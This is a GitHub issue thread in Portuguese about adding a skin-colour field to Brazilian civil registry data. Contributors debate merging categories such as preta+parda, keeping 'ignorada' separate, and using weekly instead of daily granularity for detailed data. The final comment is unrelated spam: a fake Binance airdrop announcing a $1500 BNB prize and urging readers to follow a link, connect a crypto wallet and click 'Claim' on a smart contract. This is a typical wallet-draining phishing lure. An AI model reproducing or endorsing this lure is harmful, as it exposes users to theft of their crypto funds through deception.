### ISSUE TITLE
Add skin color

### ISSUE THREAD

**Issue by capyvara** [capyvara/brazil-civil-registry-data#6]
Agora tem as opções:
(Indiferente) ou Amarela, Branca, Ignorada, Indigena, Parda, Preta

Isso multiplicaria as permutações em 6x, inviável para os detailed, precisamos achar alguma opção.

Podemos agregar algumas? (ex: Parda e Preta)
Quão importante é esse dado?
Idéias?

**Comment by beatrizjardim** [comment]
Ja vi estudos que categorizar em  branco/não branco

Em seg, 13 de jul de 2020 14:13, Marcelo Oliveira <notifications@github.com>
escreveu:

**Comment by oranzani** [comment]
Concordo com a opção que a Beatriz sugeriu. Outra é agregar parda+preta e Indígena+Amarela, ficando 3 (+ Ignorada). 
Branco/não-branco já usei e me pediram para não usar durante revisão de artigo, porque não se aplicaria tanto ao Brasil, como nos US, europa, etc. Mas acho que dependendo da feasibility do scrapy, seria uma boa solução também.

**Comment by thomas-fujiwara** [comment]
Acho importante deixar a ignorada sempre separada, a gente quer saber pra qtas pessoa esta “missing” a info.

Eu juntaria preta+parda e branca+amarela, socioeconômicamente os brancos e asiaticos sao “parecidos” no Brasil

**Comment by beatrizjardim** [comment]
Concordo em incluir a categoria "ignorada".  Minha dúvida: como ficariam os
indígenas nessa classificação?

Em seg., 13 de jul. de 2020 às 15:04, thomas-fujiwara <
notifications@github.com> escreveu:

**Comment by thomas-fujiwara** [comment]
Eh, se nao puder ter 4 (ignorada, indígena, branca+amarela, preta+parda), poderia colocar indigena com preta+parda (minorias mais vulneráveis socioeconomicamente?) , nao eh o ideal mas se precisar ter so 3 categorias...

**Comment by capyvara** [comment]
Essas 4 parece ok para os não detailed.

Para os detailed, precisa de um corte mais forte, vocês acham muito ruim fazer por semana? o dado diário tem relevância forte assim?

**Comment by thomas-fujiwara** [comment]
Eu nao tenho usado o detailed - entao por mim uma vez por semana seria OK. Mas obviamente nao posso falar pelos outros.

**Comment by oranzani** [comment]
Acho que os dados diários faria diferença mais só para mim, Marcelo. Fora modelar, o que me pegava sempre em usar semana, como comecei, era dar um valor muito alto ao atraso, porque o atraso em 7 dias fica mais exacerbado. Mas se for só eu, não tem problema, obviamente. Todo caso falo contigo. Um detail só por idade, sem place e sem sexo, ajuda?

**Comment by capyvara** [comment]
A place faria diferença (mas não muita), o sexo não pq iria tirar idade junto (não tenho como fazer uma query sexo indiferente).

O problema é que preciso de um corte pesado, já estava ruim antes e colocar pele vai fazer tudo x4 basicamente.

E se eu fizer algo do tipo, semanal mas diário só para as últimas semanas (ou último mês) ?

**Comment by beatrizjardim** [comment]
Oi pessoal!
Eu tenho analisado por mês.
😬

Eu já tinha feito um trabalho bem inicial e estou pensando em dar uma
sequência a ele, também analisando por mês.



Em sáb, 18 de jul de 2020 19:32, Marcelo Oliveira <notifications@github.com>
escreveu:

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
